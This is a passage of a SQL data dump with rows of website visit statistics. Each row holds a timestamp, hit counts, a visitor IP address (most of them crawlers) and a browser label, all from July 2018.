531426904,1,1,0,0,'54.36.149.75','other'),(272331,1531427310,1,1,0,0,'216.244.66.241','other'),(272332,1531427338,1,1,0,0,'54.36.148.124','other'),(272333,1531427433,1,1,0,0,'54.36.149.45','other'),(272334,1531427452,1,1,0,0,'80.252.155.198','firefox'),(272335,1531427497,1,1,0,0,'54.36.148.45','other'),(272336,1531427568,1,1,0,0,'54.36.149.92','other'),(272337,1531428161,1,1,0,0,'54.36.148.251','other'),(272338,1531428335,1,1,0,0,'216.244.66.241','other'),(272339,1531428356,1,1,0,0,'54.36.148.37','other'),(272340,1531428547,1,1,0,0,'54.36.148.97','other'),(272341,1531428583,1,1,0,0,'54.36.149.61','other'),(272342,1531428886,1,1,0,0,'54.36.149.96','other'),(272343,1531428979,1,1,0,0,'54.36.148.67','other'),(272344,1531429035,1,1,0,0,'54.36.148.139','other'),(272345,1531429056,1,1,0,0,'95.163.255.115','other'),(272346,1531429088,1,1,0,0,'95.163.255.114','other'),(272347,1531429143,1,1,0,0,'95.163.255.117','other'),(272348,1531429182,1,1,0,0,'91.209.11.236','other'),(272349,1531429770,3,3,0,0,'216.244.66.241','other'),(272350,1531429917,1,1,0,0,'87.250.224.85','other'),(272351,1531430055,1,1,0,0,'54.209.15.199','other'),(272352,1531430080,1,1,0,0,'54.36.148.106','other'),(272353,1531430178,1,1,0,0,'54.36.148.128','other'),(272354,1531430623,1,1,0,0,'54.36.149.85','other'),(272355,1531430714,1,1,0,0,'54.36.148.168','other'),(272356,1531430738,1,1,0,0,'54.36.148.18','other'),(272357,1531430745,1,1,0,0,'54.36.148.159','other'),(272358,1531430777,1,1,0,0,'54.36.148.78','other'),(272359,1531430852,1,1,0,0,'216.244.66.241','other'),(272360,1531430904,1,1,0,0,'18.209.160.170','other'),(272361,1531430966,1,1,0,0,'8.29.198.26','other'),(272362,1531431529,1,1,0,0,'52.205.204.247','other'),(272363,1531431680,1,1,0,0,'162.210.196.129','other'),(272364,1531431766,1,1,0,0,'54.36.148.164','other'),(272365,1531431783,1,1,0,0,'54.36.148.31','other'),(272366,1531431979,1,1,0,0,'54.36.148.176','other'),(272367,1531432042,1,1,0,0,'54.36.148.119','other'),(272368,1531432171,1,1,0,0,'54.36.148.222','other'),(272369,1531432292,6,6,0,0,'204.12.208.10','other'),(272370,1531432369,1,1,0,0,'54.36.148.91','other'),(272371,1531432393,1,1,0,0,'54.162.123.74','other'),(272372,1531432437,1,1,0,0,'54.36.149.97','other'),(272373,1531432716,1,1,0,0,'54.36.148.45','other'),(272374,1531432806,1,1,0,0,'54.36.148.103','other'),(272375,1531432924,1,1,0,0,'54.36.148.28','other'),(272376,1531432937,1,1,0,0,'54.36.148.96','other'),(272377,1531432962,1,1,0,0,'54.36.149.27','other'),(272378,1531432999,1,1,0,0,'54.36.148.102','other'),(272379,1531433212,1,1,0,0,'54.36.148.95','other'),(272380,1531433353,1,1,0,0,'216.244.66.241','other'),(272381,1531433600,1,1,0,0,'54.36.148.201','other'),(272382,1531433813,1,1,0,0,'54.36.148.65','other'),(272383,1531434019,3,3,0,0,'54.162.123.74','other'),(272384,1531434387,1,1,0,0,'54.36.149.46','other'),(272385,1531434394,1,1,0,0,'54.36.148.145','other'),(272386,1531434451,1,1,0,0,'54.36.148.77','other'),(272387,1531434501,1,1,0,0,'37.9.113.186','other'),(272388,1531434740,1,1,0,0,'8.29.198.25','other'),(272389,1531434791,1,1,0,0,'95.163.255.95','other'),(272390,1531434827,1,1,0,0,'54.36.148.148','other'),(272391,1531434916,1,1,0,0,'54.36.148.134','other'),(272392,1531434959,1,1,0,0,'54.36.148.31','other'),(272393,1531434969,3,3,0,0,'54.162.123.74','other'),(272394,1531434979,1,1,0,0,'54.36.148.92','other'),(272395,1531435021,1,1,0,0,'188.32.21.30','msie'),(272396,1531435306,1,1,0,0,'54.36.148.23','other'),(272397,1531435810,1,1,0,0,'54.36.149.50','other'),(272398,1531435894,1,1,0,0,'216.244.66.241','other'),(272399,1531435900,1,1,0,0,'54.36.148.203','other'),(272400,1531436224,1,1,0,0,'185.45.13.153','firefox'),(272401,1531436459,1,1,0,0,'54.36.148.231','other'),(272402,1531437042,1,1,0,0,'54.36.149.61','other'),(272403,1531437057,1,1,0,0,'54.36.148.96','other'),(272404,1531437190,1,1,0,0,'54.162.123.74','other'),(272405,1531437394,1,1,0,0,'54.36.148.19','other'),(272406,1531437571,2,2,0,0,'216.244.66.241','other'),(272407,1531437747,1,1,0,0,'54.36.148.76','other'),(272408,1531437821,1,1,0,0,'54.36.148.188','other'),(272409,1531437877,1,1,0,0,'54.36.148.242','other'),(272410,1531437982,1,1,0,0,'54.36.148.122','other'),(272411,1531438363,1,1,0,0,'54.36.148.141','other'),(272412,1531438423,2,2,0,0,'54.162.123.74','other'),(272413,1531438614,1,1,0,0,'54.36.149.40','other'),(272414,1531438665,1,1,0,0,'54.36.148.224','other'),(272415,1531438778,1,1,0,0,'54.36.148.91','other'),(272416,1531439075,1,1,0,0,'54.36.148.221','other'),(272417,1531439333,5,5,0,0,'54.162.123.74','other'),(272418,1531439536,1,1,0,0,'54.36.149.35','other'),(272419,1531439697,1,1,0,0,'54.36.148.111','other'),(272420,1531439703,1,1,0,0,'54.36.148.219','other'),(272421,1531439773,1,1,0,0,'54.36.148.55','other'),(272422,1531439836,1,1,0,0,'216.244.66.241','other'),(272423,1531439839,1,1,0,0,'54.36.148.106','other'),(272424,1531439889,1,1,0,0,'54.36.148.242','other'),(272425,1531439959,1,1,0,0,'54.36.149.105','other'),(272426,1531440331,1,1,0,0,'54.36.148.173','other'),(272427,1531440397,1,1,0,0,'54.36.148.153','other'),(272428,1531440418,2,2,0,0,'54.162.123.74','other'),(272429,1531440611,1,1,0,0,'54.36.148.139','other'),(272430,1531440754,1,1,0,0,'54.36.148.159','other'),(272431,1531440819,1,0,1,0,'66.249.69.228',''),(272432,1531440824,1,1,0,0,'54.36.148.251','other'),(272433,1531440896,4,4,0,0,'216.244.66.241','other'),(272434,1531441020,1,1,0,0,'54.36.148.104','other'),(272435,1531441182,1,1,0,0,'54.36.148.147','other'),(272436,1531441278,1,1,0,0,'54.36.148.35','other'),(272437,1531441430,3,3,0,0,'54.162.123.74','other'),(272438,1531441590,1,1,0,0,'54.36.148.123','other'),(272439,1531441828,1,1,0,0,'8.29.198.25','other'),(272440,1531441921,1,1,0,0,'54.36.148.102','other'),(272441,1531441980,1,1,0,0,'87.250.224.85','other'),(272442,1531442411,1,1,0,0,'54.36.149.18','other'),(272443,1531442518,1,1,0,0,'87.250.224.96','other'),(272444,1531442557,1,1,0,0,'54.36.148.105','other'),(272445,1531442607,1,1,0,0,'216.244.66.241','other'),(272446,1531442623,1,1,0,0,'54.36.148.196','other'),(272447,1531442853,1,1,0,0,'54.36.148.43','other'),(272448,1531442888,1,1,0,0,'54.36.148.157','other'),(272449,1531443335,1,1,0,0,'54.36.148.124','other'),(272450,1531443474,1,1,0,0,'54.36.148.205','other'),(272452,1531443603,1,1,0,0,'216.244.66.241','other'),(272453,1531443840,1,1,0,0,'54.36.149.38','other'),(272454,1531444002,1,1,0,0,'54.36.149.19','other'),(272455,1531444569,1,1,0,0,'54.36.148.147','other'),(272456,1531444734,1,1,0,0,'54.36.148.86','other'),(272457,1531444832,1,1,0,0,'54.36.148.73','other'),(272458,1531445073,1,1,0,0,'54.165.59.7','other'),(272459,1531445089,2,2,0,0,'216.244.66.241','other'),(272460,1531445581,1,1,0,0,'8.29.198.25','other'),(272461,1531445694,1,1,0,0,'54.36.148.52','other'),(272462,1531446021,1,1,0,0,'54.36.149.61','other'),(272463,1531446166,1,1,0,0,'54.36.148.105','other'),(272464,1531446426,1,1,0,0,'54.36.149.42','other'),(272465,1531446454,2,2,0,0,'54.36.148.191','other'),(272466,1531446743,1,1,0,0,'54.36.148.83','other'),(272467,1531446748,1,1,0,0,'54.36.149.93','other'),(272468,1531446790,1,1,0,0,'54.36.149.52','other'),(272469,1531446855,1,1,0,0,'54.36.148.84','other'),(272470,1531447317,1,1,0,0,'54.36.148.163','other'),(272471,1531447392,1,1,0,0,'54.36.148.88','other'),(272472,1531447483,1,1,0,0,'54.36.148.34','other'),(272473,1531447496,1,1,0,0,'54.36.148.176','other'),(272474,1531447554,1,1,0,0,'54.36.149.103','other'),(272475,1531447591,1,1,0,0,'54.36.148.159','other'),(272476,1531447625,1,1,0,0,'216.244.66.241','other'),(272477,1531447703,1,1,0,0,'54.36.148.55','other'),(272478,1531447747,1,1,0,0,'54.36.148.154','other'),(272479,1531447898,1,1,0,0,'46.161.9.30','chrome'),(272480,1531447909,1,1,0,0,'54.36.148.143','other'),(272481,1531447954,1,1,0,0,'54.36.148.93','other'),(272482,1531448066,1,1,0,0,'54.36.148.194','other'),(272483,1531448223,1,1,0,0,'54.36.148.85','other'),(272484,1531448413,1,1,0,0,'54.36.149.89','other'),(272485,1531448417,1,1,0,0,'54.36.148.133','other'),(272486,1531448519,1,1,0,0,'54.36.148.208','other'),(272487,1531448870,1,1,0,0,'95.163.255.97','other'),(272488,1531449237,1,1,0,0,'54.36.148.102','other'),(272489,1531449330,1,1,0,0,'54.36.148.130','other'),(272490,1531449495,1,1,0,0,'54.36.148.173','other'),(272491,1531449675,1,1,0,0,'54.36.148.19','other'),(272492,1531449862,1,1,0,0,'54.36.149.9','other'),(272493,1531449938,1,1,0,0,'178.154.200.28','other'),(272494,1531450113,1,1,0,0,'54.36.148.29','other'),(272495,1531450137,1,1,0,0,'54.36.149.68','other'),(272496,1531450144,3,3,0,0,'91.209.51.22','other'),(272497,1531450233,1,1,0,0,'54.36.149.43','other'),(272498,1531450321,2,2,0,0,'54.81.254.212','other'),(272499,1531450338,1,1,0,0,'54.36.148.82','other'),(272500,1531450419,1,1,0,0,'54.36.149.45','other'),(272501,1531450495,2,2,0,0,'216.244.66.241','other'),(272502,1531451084,1,1,0,0,'54.36.148.126','other'),(272503,1531451873,1,1,0,0,'54.36.148.133','other'),(272504,1531451885,1,1,0,0,'87.250.224.85','other'),(272505,1531452021,1,1,0,0,'54.36.149.81','other'),(272506,1531452170,1,1,0,0,'54.36.149.69','other'),(272507,1531452212,1,1,0,0,'54.36.148.222','other'),(272508,1531452238,1,1,0,0,'54.36.148.47','other'),(272509,1531452357,1,1,0,0,'54.36.148.33','other'),(272510,1531452435,1,1,0,0,'54.36.148.154','other'),(272511,1531452677,1,1,0,0,'54.36.149.64','other'),(272512,1531452680,1,1,0,0,'8.29.198.25','other'),(272513,1531452700,1,1,0,0,'54.36.148.101','other'),(272514,1531452717,1,1,0,0,'54.36.148.39','other'),(272515,1531452723,2,2,0,0,'216.244.66.241','other'),(272516,1531452737,1,1,0,0,'54.36.148.73','other'),(272517,1531452738,1,1,0,0,'54.36.148.124','other'),(272518,1531452833,4,4,0,0,'54.81.254.212','other'),(272519,1531453132,1,1,0,0,'54.36.148.226','other'),(272520,1531453273,1,1,0,0,'54.36.148.205','other'),(272521,1531453336,1,1,0,0,'54.36.148.112','other'),(272522,1531453364,1,1,0,0,'54.36.148.152','other'),(272523,1531453365,1,1,0,0,'54.36.149.49','other'),(272524,1531453467,1,1,0,0,'54.36.148.225','other'),(272525,1531453620,1,1,0,0,'54.36.149.61','other'),(272526,1531453634,1,1,0,0,'54.36.148.194','other'),(272527,1531453828,1,1,0,0,'54.81.254.212','other'),(272528,1531453857,1,1,0,0,'216.244.66.241','other'),(272529,1531453882,1,1,0,0,'54.36.149.8','other'),(272530,1531453901,1,1,0,0,'54.36.148.177','other'),(272531,1531454199,1,1,0,0,'169.61.157.77','firefox'),(272532,1531454480,1,1,0,0,'54.36.148.252','other'),(272533,1531454556,1,1,0,0,'54.36.148.220','other'),(272534,1531454613,1,1,0,0,'54.36.149.29','other'),(272535,1531454659,1,1,0,0,'136.243.82.105','other'),(272536,1531454721,1,1,0,0,'54.36.148.27','other'),(272537,1531455286,1,1,0,0,'54.36.148.43','other'),(272538,1531455485,1,1,0,0,'54.36.149.5','other'),(272539,1531455517,4,4,0,0,'54.81.254.212','other'),(272540,1531455789,1,1,0,0,'54.36.148.212','other'),(272541,1531455867,1,1,0,0,'54.36.148.76','other'),(272542,1531456097,1,1,0,0,'54.36.148.222','other'),(272543,1531456166,1,1,0,0,'54.36.149.91','other'),(272544,1531456389,1,1,0,0,'54.36.148.160','other'),(272545,1531456414,1,1,0,0,'8.29.198.25','other'),(272546,1531456454,1,1,0,0,'54.36.148.242','other'),(272547,1531456469,1,1,0,0,'54.36.148.168','other'),(272548,1531456489,1,1,0,0,'216.244.66.241','other'),(272549,1531456657,1,1,0,0,'54.36.149.21','other'),(272550,1531456812,2,2,0,0,'54.81.254.212','other'),(272551,1531456882,1,1,0,0,'54.36.148.53','other'),(272552,1531456978,1,1,0,0,'54.36.149.74','other'),(272553,1531457009,1,1,0,0,'37.9.113.115','other'),(272554,1531457242,1,1,0,0,'157.55.39.233','other'),(272555,1531457267,1,1,0,0,'54.36.148.249','other'),(272556,1531457399,1,1,0,0,'54.36.148.217','other'),(272557,1531457414,1,1,0,0,'54.36.148.73','other'),(272558,1531457416,1,1,0,0,'54.36.149.7','other'),(272559,1531457576,1,1,0,0,'216.244.66.241','other'),(272560,1531457841,1,1,0,0,'54.36.148.14','other'),(272561,1531458164,1,1,0,0,'54.36.148.87','other'),(272563,1531458271,2,2,0,0,'54.81.254.212','other'),(272564,1531458978,1,1,0,0,'216.244.66.241','other'),(272565,1531459042,1,1,0,0,'54.36.149.102','other'),(272566,1531459055,1,1,0,0,'54.36.149.73','other'),(272567,1531459388,3,3,0,0,'54.81.254.212','other'),(272568,1531459808,1,1,0,0,'66.249.69.185','chrome'),(272569,1531460027,2,2,0,0,'91.196.178.78','chrome'),(272570,1531460254,1,1,0,0,'54.36.149.13','other'),(272571,1531460567,1,1,0,0,'54.36.148.120','other'),(272572,1531460689,2,2,0,0,'54.81.254.212','other'),(272573,1531460706,2,2,0,0,'216.244.66.241','other'),(272574,1531461009,1,1,0,0,'54.36.148.35','other'),(272575,1531461226,1,1,0,0,'54.36.148.95','other'),(272576,1531461408,1,1,0,0,'162.210.196.98','other'),(272577,1531461689,1,1,0,0,'54.36.149.68','other'),(272578,1531461719,1,1,0,0,'54.36.149.27','other'),(272579,1531461757,1,1,0,0,'92.112.216.48','chrome'),(272580,1531461759,1,1,0,0,'54.36.148.23','other'),(272581,1531461952,1,1,0,0,'54.36.148.150','other'),(272582,1531462167,2,2,0,0,'91.196.178.78','chrome'),(272583,1531462187,1,1,0,0,'54.36.149.23','other'),(272584,1531462402,1,1,0,0,'54.36.148.174','other'),(272585,1531462525,1,1,0,0,'54.36.148.59','other'),(272586,1531463079,1,1,0,0,'54.36.148.13','other'),(272587,1531463094,1,1,0,0,'95.163.255.160','other'),(272588,1531463179,1,1,0,0,'54.36.148.150','other'),(272589,1531463283,5,5,0,0,'216.244.66.241','other'),(272590,1531463409,15,15,0,0,'157.55.39.233','other'),(272591,1531463416,1,1,0,0,'54.36.148.170','other'),(272592,1531463525,1,1,0,0,'8.29.198.25','other'),(272593,1531463682,1,1,0,0,'54.36.148.195','other'),(272594,1531463932,1,1,0,0,'54.36.148.20','other'),(272595,1531464056,1,1,0,0,'54.36.148.135','other'),(272596,1531464078,1,1,0,0,'54.36.148.189','other'),(272597,1531464227,3,3,0,0,'216.244.66.241','other'),(272598,1531464269,1,0,1,0,'66.249.69.228',''),(272599,1531464279,1,1,0,0,'91.196.178.72','chrome'),(272600,1531464415,1,1,0,0,'54.36.148.239','other'),(272601,1531464747,1,1,0,0,'54.36.149.54','other'),(272602,1531464789,1,1,0,0,'54.36.148.56','other'),(272603,1531465105,1,1,0,0,'91.237.107.97','chrome'),(272604,1531465439,1,1,0,0,'54.36.149.59','other'),(272605,1531465552,2,2,0,0,'91.196.178.103','chrome'),(272606,1531465569,1,1,0,0,'54.36.148.190','other'),(272607,1531465611,1,1,0,0,'40.77.167.143','other'),(272608,1531466005,1,1,0,0,'54.36.148.145','other'),(272609,1531466242,1,1,0,0,'54.36.148.129','other'),(272610,1531466415,1,1,0,0,'54.36.148.84','other'),(272611,1531466991,1,0,1,0,'66.249.69.189',''),(272612,1531467083,1,1,0,0,'54.36.148.249','other'),(272613,1531467085,1,1,0,0,'54.36.149.86','other'),(272614,1531467150,1,1,0,0,'54.36.148.182','other'),(272615,1531467250,1,1,0,0,'8.29.198.25','other'),(272616,1531467281,1,1,0,0,'54.36.148.138','other'),(272617,1531467290,1,1,0,0,'54.36.148.186','other'),(272618,1531467325,1,1,0,0,'54.36.149.14','other'),(272619,1531467477,1,1,0,0,'180.76.15.142','other'),(272620,1531468248,1,1,0,0,'54.36.148.87','other'),(272621,1531468317,1,1,0,0,'31.184.199.178','chrome'),(272622,1531468616,1,1,0,0,'54.36.149.0','other'),(272623,1531469043,5,5,0,0,'216.244.66.241','other'),(272624,1531469144,1,1,0,0,'54.36.148.208','other'),(272625,1531469162,1,1,0,0,'54.36.149.107','other'),(272626,1531469289,1,1,0,0,'54.36.148.84','other'),(272627,1531469295,1,1,0,0,'54.36.148.240','other'),(272628,1531469357,1,1,0,0,'54.36.148.209','other'),(272629,1531469388,1,1,0,0,'54.36.149.101','other'),(272630,1531469593,1,1,0,0,'54.36.148.175','other'),(272631,1531469664,1,1,0,0,'46.174.163.134','chrome'),(272632,1531469833,1,1,0,0,'54.36.148.52','other'),(272633,1531469851,1,1,0,0,'91.124.143.72','chrome'),(272634,1531469852,2,2,0,0,'91.196.178.75','firefox'),(272635,1531469951,1,1,0,0,'54.36.148.94','other'),(272636,1531470102,1,1,0,0,'54.36.149.102','other'),(272637,1531470138,1,1,0,0,'54.36.148.131','other'),(272638,1531470218,1,1,0,0,'162.210.196.130','other'),(272639,1531470291,1,1,0,0,'31.43.31.235','chrome'),(272640,1531470488,1,1,0,0,'54.36.148.162','other'),(272641,1531470512,1,1,0,0,'130.180.218.12','chrome'),(272642,1531470625,1,1,0,0,'180.76.15.5','other'),(272643,1531470757,1,1,0,0,'95.163.255.112','other'),(272644,1531470930,1,1,0,0,'54.36.148.240','other'),(272645,1531471097,1,1,0,0,'54.36.149.99','other'),(272646,1531471176,1,1,0,0,'54.36.148.168','other'),(272647,1531471212,1,1,0,0,'54.36.148.212','other'),(272648,1531471255,1,1,0,0,'91.196.178.93','chrome'),(272649,1531471337,1,1,0,0,'54.36.148.224','other'),(272650,1531471358,1,1,0,0,'77.111.244.5','chrome'),(272651,1531471371,1,1,0,0,'54.36.148.143','other'),(272652,1531471401,1,1,0,0,'54.36.148.174','other'),(272653,1531471797,1,1,0,0,'95.163.255.92','other'),(272654,1531471803,1,1,0,0,'216.244.66.241','other'),(272655,1531471840,1,1,0,0,'54.36.148.170','other'),(272656,1531471926,1,1,0,0,'91.196.177.46','chrome'),(272657,1531472153,1,1,0,0,'54.36.149.12','other'),(272658,1531472551,1,1,0,0,'157.55.39.233','other'),(272659,1531472610,1,1,0,0,'95.221.49.106','msie'),(272660,1531473265,1,1,0,0,'54.36.149.82','other'),(272661,1531473309,1,1,0,0,'54.36.148.175','other'),(272662,1531473371,1,1,0,0,'54.36.149.73','other'),(272663,1531473417,1,1,0,0,'77.111.247.66','chrome'),(272664,1531473596,1,1,0,0,'54.36.148.51','other'),(272665,1531473725,2,2,0,0,'216.244.66.241','other'),(272666,1531473784,2,2,0,0,'91.196.178.78','chrome'),(272667,1531474108,1,1,0,0,'54.36.148.56','other'),(272668,1531474228,1,1,0,0,'54.36.148.166','other'),(272669,1531474286,1,1,0,0,'54.36.148.34','other'),(272670,1531474322,1,1,0,0,'178.154.171.24','other'),(272671,1531474329,1,1,0,0,'37.9.113.74','other'),(272672,1531474361,1,1,0,0,'8.29.198.26','other'),(272673,1531474371,1,1,0,0,'54.36.148.232','other'),(272674,1531474510,1,1,0,0,'54.36.149.105','other'),(272675,1531474663,1,1,0,0,'54.36.149.24','other'),(272676,1531475102,1,1,0,0,'54.36.148.81','other'),(272677,1531475132,1,1,0,0,'54.36.149.21','other'),(272678,1531475296,1,1,0,0,'54.36.148.155','other'),(272679,1531475531,1,1,0,0,'54.36.148.86','other'),(272680,1531475683,1,1,0,0,'54.36.149.107','other'),(272681,1531475912,1,1,0,0,'54.36.148.175','other'),(272682,1531476142,3,3,0,0,'216.244.66.241','other'),(272683,1531476156,1,1,0,0,'54.36.148.81','other'),(272684,1531476162,1,1,0,0,'178.95.66.69','chrome'),(272685,1531476222,1,1,0,0,'92.113.2.55','chrome'),(272686,1531476286,1,1,0,0,'54.36.148.35','other'),(272687,1531476546,1,1,0,0,'54.36.148.249','other'),(272688,1531476571,1,1,0,0,'54.36.148.152','other'),(272689,1531476695,1,1,0,0,'54.36.149.33','other'),(272690,1531476791,1,1,0,0,'54.36.148.56','other'),(272691,1531477095,3,3,0,0,'91.196.178.68','chrome'),(272692,1531477193,1,1,0,0,'54.36.148.192','other'),(272693,1531477260,1,1,0,0,'54.36.149.44','other'),(272694,1531477282,1,1,0,0,'54.36.148.219','other'),(272695,1531477407,1,1,0,0,'54.36.148.12','other'),(272696,1531477427,1,1,0,0,'54.36.148.76','other'),(272697,1531477491,1,1,0,0,'54.36.148.15','other'),(272698,1531477595,1,1,0,0,'37.73.171.185','chrome'),(272699,1531477863,1,1,0,0,'54.36.148.65','other'),(272700,1531478083,1,1,0,0,'8.29.198.25','other'),(272701,1531478296,1,1,0,0,'54.36.148.94','other'),(272702,1531478348,2,2,0,0,'216.244.66.241','other'),(272703,1531478430,1,1,0,0,'54.36.149.4','other'),(272704,1531478486,1,1,0,0,'54.36.148.28','other'),(272705,1531478546,1,1,0,0,'54.36.148.47','other'),(272706,1531478639,1,1,0,0,'54.36.148.212','other'),(272707,1531478718,1,1,0,0,'54.36.148.64','other'),(272708,1531478745,1,1,0,0,'54.36.149.93','other'),(272709,1531478882,1,1,0,0,'95.163.255.112','other'),(272710,1531478888,1,1,0,0,'95.163.255.108','other'),(272711,1531478903,1,1,0,0,'95.163.255.114','other'),(272712,1531479155,1,1,0,0,'54.36.148.144','other'),(272713,1531479288,1,1,0,0,'54.36.148.36','other'),(272714,1531479295,1,1,0,0,'216.244.66.241','other'),(272715,1531479497,1,1,0,0,'54.36.148.97','other'),(272716,1531479532,1,1,0,0,'54.36.149.16','other'),(272717,1531479545,1,1,0,0,'54.36.149.51','other'),(272718,1531479625,1,1,0,0,'54.36.148.178','other'),(272719,1531479932,1,1,0,0,'54.36.148.62','other'),(272720,1531479942,1,1,0,0,'54.36.148.119','other'),(272721,1531480009,1,1,0,0,'176.103.214.52','chrome'),(272722,1531480100,1,1,0,0,'54.36.148.99','other'),(272723,1531480228,1,1,0,0,'54.36.149.105','other'),(272724,1531480229,1,1,0,0,'54.36.148.219','other'),(272725,1531480467,1,1,0,0,'54.36.148.174','other'),(272726,1531480656,1,1,0,0,'54.36.148.142','other'),(272727,1531480695,1,1,0,0,'54.36.148.82','other'),(272728,1531480981,1,1,0,0,'54.36.149.80','other'),(272729,1531481087,1,1,0,0,'141.8.142.74','other'),(272730,1531481320,1,1,0,0,'54.36.149.89','other'),(272731,1531481486,1,1,0,0,'54.36.148.199','other'),(272732,1531481768,1,1,0,0,'54.36.148.84','other'),(272733,1531481771,1,1,0,0,'54.36.148.201','other'),(272734,1531481905,1,1,0,0,'54.36.148.63','other'),(272736,1531481989,1,1,0,0,'216.244.66.241','other'),(272737,1531482020,2,2,0,0,'91.196.178.78','chrome'),(272738,1531482095,1,1,0,0,'176.118.50.146','chrome'),(272739,1531482309,1,1,0,0,'54.36.149.12','other'),(272740,1531482362,1,1,0,0,'54.36.149.24','other'),(272741,1531482614,1,0,1,0,'66.249.69.187',''),(272742,1531482686,1,1,0,0,'54.36.149.16','other'),(272743,1531482826,1,1,0,0,'54.36.149.86','other'),(272744,1531482850,1,1,0,0,'54.36.148.249','other'),(272745,1531482897,1,1,0,0,'54.36.148.71','other'),(272746,1531482975,1,1,0,0,'54.36.149.25','other'),(272747,1531483570,1,1,0,0,'54.36.148.199','other'),(272748,1531483799,1,1,0,0,'54.36.149.81','other'),(272749,1531483919,1,1,0,0,'95.163.255.98','other'),(272750,1531484195,1,1,0,0,'54.36.149.45','other'),(272751,1531484257,1,1,0,0,'54.36.148.98','other'),(272752,1531484261,1,1,0,0,'54.36.149.15','other'),(272753,1531484286,1,1,0,0,'54.36.148.168','other'),(272754,1531484465,1,1,0,0,'54.36.149.72','other'),(272755,1531484509,1,1,0,0,'54.36.148.68','other'),(272756,1531484559,6,6,0,0,'216.244.66.241','other'),(272757,1531484697,1,1,0,0,'54.36.148.250','other'),(272758,1531484791,1,1,0,0,'54.36.148.128','other'),(272759,1531485057,1,1,0,0,'91.196.178.134','firefox'),(272760,1531485219,1,1,0,0,'8.29.198.25','other'),(272761,1531485233,1,1,0,0,'195.211.174.93','chrome'),(272762,1531485396,1,1,0,0,'54.36.148.102','other'),(272763,1531485477,1,1,0,0,'54.36.148.32','other'),(272764,1531485500,1,1,0,0,'54.36.149.85','other'),(272765,1531485550,1,1,0,0,'54.36.148.157','other'),(272766,1531486321,1,1,0,0,'178.154.171.88','other'),(272767,1531486544,1,1,0,0,'54.36.149.80','other'),(272768,1531486582,1,1,0,0,'54.36.148.152','other'),(272769,1531486608,1,1,0,0,'107.21.1.8','other'),(272770,1531486610,1,1,0,0,'54.208.102.37','other'),(272771,1531486691,4,4,0,0,'216.244.66.241','other'),(272772,1531486742,1,1,0,0,'54.36.148.243','other'),(272773,1531486782,1,1,0,0,'54.36.149.19','other'),(272774,1531486901,1,1,0,0,'54.36.148.125','other'),(272775,1531486926,1,1,0,0,'54.36.148.85','other'),(272776,1531487643,1,1,0,0,'216.244.66.241','other'),(272777,1531487649,1,1,0,0,'54.36.148.161','other'),(272778,1531487677,1,1,0,0,'54.36.148.132','other'),(272779,1531487735,1,1,0,0,'54.36.148.107','other'),(272780,1531488205,1,1,0,0,'54.36.148.54','other'),(272781,1531488216,1,1,0,0,'141.8.142.74','other'),(272782,1531488551,1,1,0,0,'54.36.148.37','other'),(272783,1531488552,1,1,0,0,'54.36.148.129','other'),(272784,1531488723,1,1,0,0,'54.36.148.33','other'),(272785,1531488752,1,1,0,0,'54.36.148.167','other'),(272786,1531488847,1,1,0,0,'54.36.148.131','other'),(272787,1531488915,1,1,0,0,'178.95.92.13','chrome'),(272788,1531488924,1,1,0,0,'8.29.198.27','other'),(272789,1531489080,1,1,0,0,'54.36.149.93','other'),(272790,1531489251,3,3,0,0,'216.244.66.241','other'),(272791,1531489406,1,1,0,0,'141.8.142.74','other'),(272792,1531489603,1,1,0,0,'54.36.148.107','other'),(272793,1531489695,1,1,0,0,'54.36.148.70','other'),(272794,1531489754,1,1,0,0,'54.36.149.4','other'),(272795,1531490153,1,1,0,0,'54.36.148.124','other'),(272796,1531490307,1,1,0,0,'180.76.15.161','other'),(272797,1531490373,1,1,0,0,'54.36.149.12','other'),(272798,1531490485,1,1,0,0,'62.80.185.138','chrome'),(272799,1531490546,2,2,0,0,'37.54.114.62','chrome'),(272800,1531490846,1,1,0,0,'54.36.148.195','other'),(272801,1531491127,1,1,0,0,'54.36.148.77','other'),(272802,1531491313,1,1,0,0,'54.36.148.209','other'),(272803,1531491443,1,1,0,0,'54.36.148.167','other'),(272804,1531491470,1,1,0,0,'54.36.149.43','other'),(272805,1531491524,1,1,0,0,'54.36.149.91','other'),(272806,1531491636,2,2,0,0,'95.163.255.116','other'),(272807,1531491666,2,2,0,0,'95.163.255.106','other'),(272808,1531491697,1,1,0,0,'95.163.255.108','other'),(272809,1531491760,1,1,0,0,'54.36.149.80','other'),(272810,1531491854,1,1,0,0,'95.163.255.115','other'),(272811,1531491923,2,2,0,0,'95.163.255.114','other'),(272812,1531492005,1,1,0,0,'95.163.255.105','other'),(272813,1531492092,1,1,0,0,'95.163.255.103','other'),(272814,1531492130,1,1,0,0,'54.36.148.137','other'),(272815,1531492370,2,2,0,0,'95.163.255.119','other'),(272816,1531492371,1,1,0,0,'54.36.149.38','other'),(272817,1531492390,1,1,0,0,'54.36.148.150','other'),(272818,1531492514,1,1,0,0,'95.163.255.112','other'),(272819,1531492568,4,4,0,0,'216.244.66.241','other'),(272820,1531492614,3,3,0,0,'95.163.255.104','other'),(272821,1531492704,1,1,0,0,'95.163.255.102','other'),(272822,1531492787,2,2,0,0,'95.163.255.113','other'),(272823,1531492893,1,1,0,0,'144.76.166.14','other'),(272824,1531492905,1,1,0,0,'95.163.255.118','other'),(272825,1531492907,1,1,0,0,'54.36.148.40','other'),(272826,1531492954,1,1,0,0,'134.249.146.125','chrome'),(272827,1531492964,1,1,0,0,'95.163.255.108','other'),(272828,1531493025,1,1,0,0,'95.163.255.103','other'),(272829,1531493135,1,1,0,0,'54.36.148.179','other'),(272830,1531493155,1,1,0,0,'95.163.255.109','other'),(272831,1531493280,1,1,0,0,'54.36.148.47','other'),(272832,1531493315,1,1,0,0,'95.163.255.114','other'),(272833,1531493362,1,1,0,0,'95.163.255.117','other'),(272834,1531493429,1,1,0,0,'54.36.148.117','other'),(272835,1531493439,1,1,0,0,'54.36.148.69','other'),(272836,1531493535,1,1,0,0,'54.36.149.26','other'),(272837,1531493610,1,1,0,0,'178.154.171.88','other'),(272838,1531493773,1,1,0,0,'54.36.148.156','other'),(272839,1531493852,2,2,0,0,'216.244.66.241','other'),(272840,1531493916,1,1,0,0,'54.36.149.97','other'),(272841,1531493918,1,1,0,0,'5.9.155.226','other'),(272842,1531493945,1,1,0,0,'54.36.149.17','other'),(272843,1531494256,1,1,0,0,'54.36.148.221','other'),(272844,1531494310,1,1,0,0,'54.36.148.123','other'),(272845,1531494316,1,1,0,0,'54.36.148.230','other'),(272846,1531494405,1,1,0,0,'54.36.148.134','other'),(272847,1531494878,1,1,0,0,'188.230.43.254','other'),(2